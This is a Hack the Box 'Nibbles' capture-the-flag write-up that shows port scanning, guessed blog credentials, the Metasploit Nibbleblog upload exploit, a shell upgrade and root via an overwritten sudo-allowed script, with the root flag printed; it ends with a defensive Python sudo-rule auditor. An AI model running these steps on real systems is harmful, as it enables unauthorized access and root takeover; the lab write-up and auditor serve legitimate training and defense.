Hack the box Nibbles write up


Introduction

It is an easy machine from Hack the Box. It involves exploiting the Nibbleblog service, followed by tampering with a script that sudo allows to run as root in order to get a root shell.

Steps involved

1-Port Scan
2-Visiting website
3-Finding Vulnerability
4-Exploiting via metasploit
5-Privilege escalation via script

Commands involved

1-nmap -sV -sC -A -v -oV 10.10.10.75
2-msfconsole
3-set rhost 10.10.10.75
4-set username admin
5-set password nibbles
6-set targeturi /nibbleblog
7-sudo -l
8-echo "#! /bin/bash" > monitor.sh
9-echo "su" >> monitor.sh
10-sudo /home/nibbler/personal/stuff/monitor.sh

Port Scan

Nmap 7.70 scan initiated Sun Apr 26 10:01:32 2020 as: nmap -sV -sC -A -v -oV 10.10.10.75
Increasing send delay for 10.10.10.75 from 0 to 5 due to 172 out of 572 dropped probes since last increase.
Nmap scan report for 10.10.10.75
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=4/26%OT=22%CT=1%CU=39953%PV=Y%DS=2%DC=T%G=Y%TM=5EA5949
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=100%GCD=1%ISR=10B%TI=Z%II=I%TS=8)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.001 days (since Sun Apr 26 10:01:46 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 423.45 ms 10.10.14.1
2 425.66 ms 10.10.10.75
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun Apr 26 10:03:01 2020 -- 1 IP address (1 host up) scanned in 89.14 seconds

Visiting website

The first step I always take is to visit the website.

The page source showed me that there is a /nibbleblog directory.


Finding Vulnerability

So now we see it's running Nibbleblog. So let's search for an exploit for it.


And I found a Metasploit module, but it needs credentials.

So there was some guessing involved.


Exploiting via metasploit

The creds that worked were admin:nibbles

msf5 exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75
rhost => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > set username admin
username => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set password nibbles
password => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
targeturi => /nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > run

And now we have a Meterpreter shell, so we can read the user flag.


Let’s get a full shell.

python3 -c 'import pty; pty.spawn("/bin/sh")'
bash -i

After some enumeration I found a .sh file.

nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ ls -al
ls -al
total 24
drwxr-xr-x 4 nibbler nibbler 4096 Apr 26 10:28 .
drwxr-xr-x 3 root root 4096 Dec 10 2017 ..
-rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 personal
-r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip
-r-------- 1 nibbler nibbler 33 Dec 10 2017 user.txt

Privilege escalation via script

Now let’s check the sudo permissions of the user.

nibbler@Nibbles:/$ sudo -l
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

It says that user nibbler can run monitor.sh as root.

So what I did was remove the original file and replace it with my own.

echo "#! /bin/bash" > monitor.sh
echo "su" >> monitor.sh

And ran it which gave me the root access.

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
whoami
whoami
ls
ls
sudo: unable to resolve host Nibbles: Connection timed out
root@Nibbles:/home/nibbler/personal/stuff# whoami
root
root@Nibbles:/home/nibbler/personal/stuff# ls
monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# cat monitor.sh
cat monitor.sh
#! /bin/bash
su
root@Nibbles:/home/nibbler/personal/stuff# ls -al
ls -al
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Apr 26 10:41 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxr-xr-x 1 nibbler nibbler 16 Apr 26 10:53 monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt
cat /root/root.txt
b6d745c0dfb6457c55591efc898ef88c
root@Nibbles:/home/nibbler/personal/stuff#
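The root cause of this escalation is a sudo rule pointing at a script that the rule's own user owns, so the user can simply rewrite it. As a defensive counterpart, here is an added example (my own code, not from the post, Hack The Box or the machine) that parses sudo -l style rule lines and checks whether the command file, or any directory above it, is owned or writable by the allowed user. The temp-dir layout and the rule text inside demo_nibbles_layout() are constructed to mirror the post's finding; the script path and contents there are assumptions.

```python
"""Audit sudo rules for root-run commands that the allowed user could rewrite.

Added example for this write-up, not part of the original post. The rule text
and directory layout in demo_nibbles_layout() are constructed to mirror the
post's finding; the paths used there are assumptions.
"""
import os
import re
import stat
import tempfile

# Matches rule lines such as "(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S*).*$")


def parse_sudo_rules(text):
    """Return runas user, tags and command path for each rule line in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            rules.append({"runas": m.group("runas"), "tags": tags, "cmd": m.group("cmd")})
    return rules


def path_components(path):
    """Yield the path itself, then each ancestor directory up to '/'."""
    path = os.path.abspath(path)
    while True:
        yield path
        parent = os.path.dirname(path)
        if parent == path:
            return
        path = parent


def user_can_modify(st, uid, gids):
    """True if a process with this uid/gids could edit or replace the object.
    Ownership alone is enough: an owner can always chmod the file writable again."""
    mode = st.st_mode
    if st.st_uid == uid:
        return True
    # A sticky shared directory (like /tmp) does not let others replace root-owned entries.
    if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
        return False
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_command_path(cmd, uid, gids):
    """List every component of cmd's path the user could tamper with.
    A writable parent directory is as bad as a writable file: the file can be
    renamed away and replaced, which is exactly what this write-up does."""
    findings = []
    for comp in path_components(cmd):
        try:
            st = os.lstat(comp)  # lstat: a user-owned symlink could be re-pointed
        except FileNotFoundError:
            findings.append((comp, "does not exist"))
            continue
        if user_can_modify(st, uid, gids):
            findings.append((comp, "modifiable by uid %d" % uid))
    return findings


def audit_sudo_output(text, uid, gids):
    """Cross-check each root rule against the filesystem; return only the weak ones."""
    weak = []
    for rule in parse_sudo_rules(text):
        if rule["runas"] not in ("root", "ALL"):
            continue
        findings = audit_command_path(rule["cmd"], uid, gids)
        if findings:
            weak.append({"rule": rule, "findings": findings})
    return weak


def demo_nibbles_layout():
    """Rebuild the post's layout in a temp dir owned by the current user and audit it."""
    with tempfile.TemporaryDirectory() as home:
        script = os.path.join(home, "personal", "stuff", "monitor.sh")  # assumed layout
        os.makedirs(os.path.dirname(script))
        with open(script, "w") as f:
            f.write("#!/bin/bash\nuptime\n")  # constructed stand-in for the real script
        os.chmod(script, 0o755)
        # Constructed sudo -l output in the same shape as the one in the post.
        sudo_l = ("User nibbler may run the following commands on Nibbles:\n"
                  "    (root) NOPASSWD: %s\n" % script)
        return audit_sudo_output(sudo_l, os.getuid(), [os.getgid()])


if __name__ == "__main__":
    for weak in demo_nibbles_layout():
        print("WEAK:", weak["rule"]["cmd"])
        for comp, why in weak["findings"]:
            print("   ", comp, "-", why)
```

The fix the audit points at is the usual one: a command granted via sudo must live in a root-owned, non-writable path (for example under /usr/local/sbin), so that the user who may run it cannot also decide what it does.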
